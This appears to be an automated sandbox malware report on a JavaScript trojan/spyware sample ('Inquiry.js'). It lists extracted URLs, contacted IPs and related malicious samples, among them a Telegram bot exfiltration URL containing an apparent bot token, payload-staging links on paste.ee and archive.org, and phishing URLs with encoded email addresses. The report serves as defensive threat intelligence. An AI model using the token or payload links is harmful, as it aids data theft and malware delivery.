                                https://api.telegram.org/bot8122064310:AAFBCVyMfJVoD3s1eB-6ymRD9cZooNbGkNo/sendDocumentfalse
                                  high
                                  http://ip-api.com/line/?fields=hostingfalse
                                    high
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabMSBuild.exe, 00000007.00000002.2140780732.0000000004420000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2140780732.0000000004488000.00000004.00000800.00020000.00000000.sdmp, tmp361.tmp.dat.7.dr, tmp5B6.tmp.dat.7.drfalse
                                      high
                                      https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFtmp178.tmp.dat.7.drfalse
                                        high
                                        https://duckduckgo.com/ac/?q=MSBuild.exe, 00000007.00000002.2140780732.0000000004420000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2140780732.0000000004488000.00000004.00000800.00020000.00000000.sdmp, tmp361.tmp.dat.7.dr, tmp5B6.tmp.dat.7.drfalse
                                          high
                                          https://api.telegram.orgMSBuild.exe, 00000007.00000002.2118047859.00000000037FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://api.telegram.org/botMSBuild.exe, 00000007.00000002.2118047859.00000000037FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://analytics.paste.eewscript.exe, 00000000.00000002.1737787206.0000020A7FAB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=MSBuild.exe, 00000007.00000002.2140780732.0000000004420000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2140780732.0000000004488000.00000004.00000800.00020000.00000000.sdmp, tmp361.tmp.dat.7.dr, tmp5B6.tmp.dat.7.drfalse
                                                high
                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17MSBuild.exe, 00000007.00000002.2118047859.000000000354D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2140780732.0000000004470000.00000004.00000800.00020000.00000000.sdmp, tmp46C.tmp.dat.7.dr, tmp42D.tmp.dat.7.drfalse
                                                  high
                                                  https://chrome.google.com/webstore?hl=enMSBuild.exe, 00000007.00000002.2118047859.000000000362D000.00000004.00000800.00020000.00000000.sdmp, tmp558.tmp.dat.7.drfalse
                                                    high
                                                    https://chrome.google.com/webstore?hl=enWebtmp558.tmp.dat.7.drfalse
                                                      high
                                                      https://www.google.comwscript.exe, 00000000.00000002.1736198103.0000020A01750000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.oracle.com/technetwork/java/javase/downloadsMSBuild.exe, 00000007.00000002.2154852069.0000000006625000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://x1.c.lencr.org/0cert9.db.7.drfalse
                                                            high
                                                            http://x1.i.lencr.org/0cert9.db.7.drfalse
                                                              high
                                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallMSBuild.exe, 00000007.00000002.2140780732.000000000444B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2140780732.0000000004424000.00000004.00000800.00020000.00000000.sdmp, tmp46C.tmp.dat.7.dr, tmp42D.tmp.dat.7.drfalse
                                                                high
                                                                http://www.w3.orlwscript.exe, 00000000.00000003.1735248192.0000020A01AC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchMSBuild.exe, 00000007.00000002.2140780732.0000000004420000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2140780732.0000000004488000.00000004.00000800.00020000.00000000.sdmp, tmp361.tmp.dat.7.dr, tmp5B6.tmp.dat.7.drfalse
                                                                  high
                                                                  http://ip-api.comMSBuild.exe, 00000007.00000002.2118047859.00000000037C4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2118047859.0000000003764000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://paste.ee/wscript.exe, 00000000.00000002.1737195665.0000020A01DBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735276479.0000020A01DBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://ia600805.us.archive.orgpowershell.exe, 00000001.00000002.2011416619.000001CF9F8E3000.00000004.00000800.00020000.00000000.sdmptrue
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://cdnjs.cloudflare.comwscript.exe, 00000000.00000002.1736198103.0000020A01750000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://icanhazip.comMSBuild.exe, 00000007.00000002.2118047859.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2118047859.000000000354D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2118047859.0000000003381000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2118047859.000000000345F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://cdnjs.cloudflare.com;wscript.exe, 00000000.00000002.1737787206.0000020A7FAB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2011416619.000001CF9F6C1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2118047859.0000000003423000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://secure.gravatar.comwscript.exe, 00000000.00000002.1736198103.0000020A01750000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.office.com/MSBuild.exe, 00000007.00000002.2118047859.000000000373B000.00000004.00000800.00020000.00000000.sdmp, tmp761.tmp.dat.7.drfalse
                                                                                high
                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoMSBuild.exe, 00000007.00000002.2140780732.0000000004420000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2140780732.0000000004488000.00000004.00000800.00020000.00000000.sdmp, tmp361.tmp.dat.7.dr, tmp5B6.tmp.dat.7.drfalse
                                                                                  high
                                                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.2011416619.000001CF9F8E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.2011416619.000001CF9F8E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://paste.ee/d/rVRbIsiehTwscript.exe, 00000000.00000002.1737055356.0000020A01C96000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1734301630.0000020A01C95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1734007044.0000020A01C8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://www.google.com;wscript.exe, 00000000.00000002.1737787206.0000020A7FAB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=MSBuild.exe, 00000007.00000002.2140780732.0000000004420000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2140780732.0000000004488000.00000004.00000800.00020000.00000000.sdmp, tmp361.tmp.dat.7.dr, tmp5B6.tmp.dat.7.drfalse
                                                                                          high
                                                                                          https://www.office.com/Officetmp761.tmp.dat.7.drfalse
                                                                                            high
                                                                                            http://crl.rootca1.amazontrust.com/rootca1.crl0cert9.db.7.drfalse
                                                                                              high
                                                                                              https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpgXpowershell.exe, 00000001.00000002.2011416619.000001CF9F8E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://ocsp.rootca1.amazontrust.com0:cert9.db.7.drfalse
                                                                                                high
                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016MSBuild.exe, 00000007.00000002.2118047859.000000000354D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2140780732.0000000004470000.00000004.00000800.00020000.00000000.sdmp, tmp46C.tmp.dat.7.dr, tmp42D.tmp.dat.7.drfalse
                                                                                                  high
                                                                                                  https://www.ecosia.org/newtab/MSBuild.exe, 00000007.00000002.2140780732.0000000004420000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2140780732.0000000004488000.00000004.00000800.00020000.00000000.sdmp, tmp361.tmp.dat.7.dr, tmp5B6.tmp.dat.7.drfalse
                                                                                                    high
                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brtmp178.tmp.dat.7.drfalse
                                                                                                      high
                                                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.2011416619.000001CF9F8E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://icanhazip.com/tMSBuild.exe, 00000007.00000002.2118047859.000000000345F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://www.office.com/LRMSBuild.exe, 00000007.00000002.2118047859.000000000373B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://ac.ecosia.org/autocomplete?q=MSBuild.exe, 00000007.00000002.2140780732.0000000004420000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2140780732.0000000004488000.00000004.00000800.00020000.00000000.sdmp, tmp361.tmp.dat.7.dr, tmp5B6.tmp.dat.7.drfalse
                                                                                                              high
                                                                                                              https://paste.ee/Uwscript.exe, 00000000.00000002.1737195665.0000020A01DBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735276479.0000020A01DBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://whatismyipaddressnow.co/API/FETCH/getcountry.phpMSBuild.exe, 00000007.00000002.2118047859.0000000003381000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?cert9.db.7.drfalse
                                                                                                                  high
                                                                                                                  https://analytics.paste.ee;wscript.exe, 00000000.00000002.1736198103.0000020A01750000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://aka.ms/pscore68powershell.exe, 00000001.00000002.2011416619.000001CF9F6C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://support.mozilla.orgtmp178.tmp.dat.7.drfalse
                                                                                                                      high
                                                                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesMSBuild.exe, 00000007.00000002.2140780732.000000000444B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2140780732.0000000004424000.00000004.00000800.00020000.00000000.sdmp, tmp46C.tmp.dat.7.dr, tmp42D.tmp.dat.7.drfalse
                                                                                                                        high
                                                                                                                        http://api.telegram.orgMSBuild.exe, 00000007.00000002.2118047859.00000000037FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=MSBuild.exe, 00000007.00000002.2140780732.0000000004420000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2140780732.0000000004488000.00000004.00000800.00020000.00000000.sdmp, tmp361.tmp.dat.7.dr, tmp5B6.tmp.dat.7.drfalse
                                                                                                                            high
                                                                                                                            https://support.microMSBuild.exe, 00000007.00000002.2118047859.000000000354D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://themes.googleusercontent.comwscript.exe, 00000000.00000002.1737787206.0000020A7FAB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              • No. of IPs < 25%
                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                              • 75% < No. of IPs
                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                              162.241.87.113
                                                                                                                              melbournedistillers.com.auUnited States
                                                                                                                              46606UNIFIEDLAYER-AS-1UStrue
                                                                                                                              23.186.113.60
                                                                                                                              paste.eeReserved
                                                                                                                              49466KLAYER-GLOBALNLfalse
                                                                                                                              208.95.112.1
                                                                                                                              ip-api.comUnited States
                                                                                                                              53334TUT-ASUSfalse
                                                                                                                              149.154.167.220
                                                                                                                              api.telegram.orgUnited Kingdom
                                                                                                                              62041TELEGRAMRUfalse
                                                                                                                              104.16.184.241
                                                                                                                              icanhazip.comUnited States
                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                              207.241.227.155
                                                                                                                              ia600805.us.archive.orgUnited States
                                                                                                                              7941INTERNET-ARCHIVEUStrue
                                                                                                                              Joe Sandbox version:42.0.0 Malachite
                                                                                                                              Analysis ID:1591681
                                                                                                                              Start date and time:2025-01-15 09:57:11 +01:00
                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                              Overall analysis duration:0h 6m 33s
                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                              Report type:full
                                                                                                                              Cookbook file name:default.jbs
                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                              Number of analysed new started processes analysed:15
                                                                                                                              Number of new started drivers analysed:0
                                                                                                                              Number of existing processes analysed:0
                                                                                                                              Number of existing drivers analysed:0
                                                                                                                              Number of injected processes analysed:0
                                                                                                                              Technologies:
                                                                                                                              • HCA enabled
                                                                                                                              • EGA enabled
                                                                                                                              • GSI enabled (Javascript)
                                                                                                                              • AMSI enabled
                                                                                                                              Analysis Mode:default
                                                                                                                              Analysis stop reason:Timeout
                                                                                                                              Sample name:Inquiry.js
                                                                                                                              Detection:MAL
                                                                                                                              Classification:mal100.troj.spyw.expl.evad.winJS@18/23@7/6
                                                                                                                              EGA Information:
                                                                                                                              • Successful, ratio: 100%
                                                                                                                              HCA Information:
                                                                                                                              • Successful, ratio: 100%
                                                                                                                              • Number of executed functions: 205
                                                                                                                              • Number of non-executed functions: 3
                                                                                                                              Cookbook Comments:
                                                                                                                              • Found application associated with file extension: .js
                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                              • Excluded IPs from analysis (whitelisted): 4.245.163.56, 199.232.214.172, 2.17.190.73, 20.242.39.171, 40.69.42.241, 20.12.23.50, 13.107.246.45
                                                                                                                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, e3913.cd.akamaiedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, cac-ocsp.digicert.com.edgekey.net, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, azureedge-t-prod.trafficmanager.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                              TimeTypeDescription
                                                                                                                              03:58:09API Interceptor64x Sleep call for process: powershell.exe modified
                                                                                                                              03:58:42API Interceptor21x Sleep call for process: MSBuild.exe modified
                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              162.241.87.113https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/safetyworksolutions.com%2Fkese%2F7980321465/eW9vbmp1LmNob0Bib2xsb3JlLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/safetyworksolutions.com%2Fpklxg%2F1769066015/ai5taWNoYWVsLm1hcnNoQG92ZXJsYWtlaG9zcGl0YWwub3JnGet hashmaliciousUnknownBrowse
                                                                                                                                  https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/%73%61%66%65%74%79%77%6F%72%6B%73%6F%6C%75%74%69%6F%6E%73%2E%63%6F%6D%2F%73%78%7A%70%2F7220292368/am9lLm5ndXllbkBsZWcud2EuZ292Get hashmaliciousUnknownBrowse
                                                                                                                                    https://ipp.safetyworksolutions.com/Get hashmaliciousUnknownBrowse
                                                                                                                                      signature.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                        Vertexgroup#Signature.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                          https://service.clearservice.com/constructionns/track/link.jsp?id1=7962783&id2=1118626513&link=https://watercolorjourney.net/afew/ribs.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                            https://us-west-2.protection.sophos.com/?d=sendibm3.com&u=aHR0cHM6Ly9lOWRqNy5yLmFnLmQuc2VuZGlibTMuY29tL21rL2NsL2Yvc2gvT3ljWnZIdUZvMWVRc25iY0tMWktJREVHL2NnVmNyV21hWFhrZg==&i=NThlN2NjYzYyOTljZjkxNGY4YmM0YmNh&t=VnQ2OXdVTk5pNGo3ZVpJdGxqM3hWU01RTFNlTTR3MVJQYzE0U1QzTnJSWT0=&h=3051c7643cbf456abcee4da5b8589e9f&s=AVNPUEhUT0NFTkNSWVBUSVZ8AqEkCzalfWzVtfa3JPWpqexIqdRxhnkmNvFrX5FCFHbzmUEDyREh-sSR_GxUDZUFP4_iKFiHHCQrvBd4vpKuC2uTI8TlTsM5VBshiKK92DyKYTjtekCdl7a_yoDRBqgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                              https://clicks.aweber.com/y/ct/?l=1Lr_k&m=h9RNUFV_ixtHDTP&b=0la683CmRD4xZfKbroa5Lg#MZGlhbmUuaGFuYXVlckByYXZlaXMuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                https://clicks.aweber.com/y/ct/?l=1Lr_k&m=h9RNUFV_ixtHDTP&b=0la683CmRD4xZfKbroa5Lg#McGF0dGkucGFzc21vcmVAZmlyc3RvbnRhcmlvLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  208.95.112.117369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                                                                                  • ip-api.com/line/?fields=hosting
                                                                                                                                                  q9JZUaS1Gy.docGet hashmaliciousUnknownBrowse
                                                                                                                                                  • ip-api.com/json/8.46.123.189
                                                                                                                                                  VRO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • ip-api.com/json/8.46.123.189
                                                                                                                                                  mP8rzGD7fG.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                  • ip-api.com/json/8.46.123.189
                                                                                                                                                  VRO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • ip-api.com/json/8.46.123.189
                                                                                                                                                  mP8rzGD7fG.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                  • ip-api.com/json/8.46.123.189
                                                                                                                                                  iTVsz8WAu4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • ip-api.com/json/8.46.123.189
                                                                                                                                                  HLi4q5WAh3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • ip-api.com/json/8.46.123.189
                                                                                                                                                  e0691gXIKs.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • ip-api.com/json/8.46.123.189
                                                                                                                                                  hJ1bl8p7dJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • ip-api.com/json/8.46.123.189
                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  s-part-0017.t-0009.t-msedge.nethttp://jfdhq.offerpeercheck.comGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 13.107.246.45
                                                                                                                                                  T1#U5b89#U88c5#U53051.0.3.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 13.107.246.45
                                                                                                                                                  https://padlet.com/prowebsolutions488/new-message-jba6y6w7rg9tzzmnGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 13.107.246.45
                                                                                                                                                  rRFQ_BIDLET-PO772917811_PROPOSL_BG_AD____PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 13.107.246.45
                                                                                                                                                  xjljKPlxqO.dllGet hashmaliciousWannacryBrowse
                                                                                                                                                  • 13.107.246.45
                                                                                                                                                  GUtEaDsc9X.dllGet hashmaliciousWannacryBrowse
                                                                                                                                                  • 13.107.246.45
                                                                                                                                                  9kNjKSEUym.dllGet hashmaliciousWannacryBrowse
                                                                                                                                                  • 13.107.246.45
                                                                                                                                                  https://telegrams-tw.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                  • 13.107.246.45
                                                                                                                                                  https://6y.tickarmoz.ru/aY57/Get hashmaliciousUnknownBrowse
                                                                                                                                                  • 13.107.246.45
                                                                                                                                                  Eastern Contractors Corporation Contract and submittal document.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 13.107.246.45
                                                                                                                                                  bg.microsoft.map.fastly.netnew.batGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 199.232.214.172
                                                                                                                                                  2387315401298627745.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                                                  • 199.232.214.172
                                                                                                                                                  92.255.57.112.ps1Get hashmaliciousPureCrypterBrowse
                                                                                                                                                  • 199.232.210.172
                                                                                                                                                  1475127682155276.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                                                  • 199.232.210.172
                                                                                                                                                  Invdoc80.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 199.232.210.172
                                                                                                                                                  Reversed order 24-25.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 199.232.210.172
                                                                                                                                                  wmnq39xe8J.dllGet hashmaliciousWannacryBrowse
                                                                                                                                                  • 199.232.214.172
                                                                                                                                                  Final-Agreement-Document#808977735.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 199.232.210.172
                                                                                                                                                  tTbeoLWNhb.dllGet hashmaliciousWannacryBrowse
                                                                                                                                                  • 199.232.214.172
                                                                                                                                                  Document-01-16-25.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 199.232.210.172
                                                                                                                                                  paste.eeTax_Refund_Claim_2024_Australian_Taxation_Office.jsGet hashmaliciousRemcosBrowse
                                                                                                                                                  • 188.114.96.3
                                                                                                                                                  mniscreenthinkinggoodforentiretimegoodfotbusubessthings.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                                                                                  • 104.21.84.67
                                                                                                                                                  bad.txtGet hashmaliciousAsyncRATBrowse
                                                                                                                                                  • 104.21.84.67
                                                                                                                                                  BBVA S.A..vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                  • 104.21.84.67
                                                                                                                                                  greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                                                  • 172.67.187.200
                                                                                                                                                  seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                                                  • 104.21.84.67
                                                                                                                                                  sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                                                  • 172.67.187.200
                                                                                                                                                  createdbetterthingswithgreatnressgivenmebackwithnice.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                                                                                  • 104.21.84.67
                                                                                                                                                  givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                                                  • 104.21.84.67
                                                                                                                                                  clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                                                  • 172.67.187.200
                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  TUT-ASUS17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                                                                                  • 208.95.112.1
                                                                                                                                                  q9JZUaS1Gy.docGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 208.95.112.1
                                                                                                                                                  VRO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 208.95.112.1
                                                                                                                                                  mP8rzGD7fG.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 208.95.112.1
                                                                                                                                                  VRO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 208.95.112.1
                                                                                                                                                  mP8rzGD7fG.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 208.95.112.1
                                                                                                                                                  iTVsz8WAu4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 208.95.112.1
                                                                                                                                                  HLi4q5WAh3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 208.95.112.1
                                                                                                                                                  e0691gXIKs.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 208.95.112.1
                                                                                                                                                  hJ1bl8p7dJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 208.95.112.1
                                                                                                                                                  KLAYER-GLOBALNLmain_sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                  • 23.186.92.242
                                                                                                                                                  nklm68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 23.186.92.237
                                                                                                                                                  B7nYecfqH0.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 23.186.100.144
                                                                                                                                                  arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                  • 23.186.92.227
                                                                                                                                                  arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                  • 23.186.92.229
                                                                                                                                                  9E68ZQYwf9.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                  • 23.186.92.208
                                                                                                                                                  5Yq5yucG5n.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                  • 23.186.92.238
                                                                                                                                                  2UcT1ff1Bd.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                  • 23.186.92.209
                                                                                                                                                  6UBZy86GRQ.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                  • 23.186.100.151
                                                                                                                                                  9VqopZcU2xGet hashmaliciousMiraiBrowse
                                                                                                                                                  • 23.186.92.227
                                                                                                                                                  UNIFIEDLAYER-AS-1UShttps://url.rw/ddj4fGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 108.179.252.83
                                                                                                                                                  Final-Agreement-Document#808977735.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 108.179.252.84
                                                                                                                                                  mitel.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 162.241.253.231
                                                                                                                                                  https://bafkreibsbjyfimxhx74m5tcypjri7hfpts4m6rwijhar7bcrbkwhh2xgbe.ipfs.flk-ipfs.xyz/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 108.167.142.88
                                                                                                                                                  https://emp.eduyield.com/el?aid=962445be-3c17-11ec-9620-0e45aa61dde5&cid=497&dest=https://google.com/amp/avrancecorp.com/wp-web/Griffinwink/64616b6f74616c796e6e406772696666696e77696e6b2e636f6d/$ZGFrb3&pid=564628&rid=68730789Get hashmaliciousUnknownBrowse
                                                                                                                                                  • 50.6.174.34
                                                                                                                                                  logitix.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 69.49.230.198
                                                                                                                                                  Document_31055.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 108.167.132.254
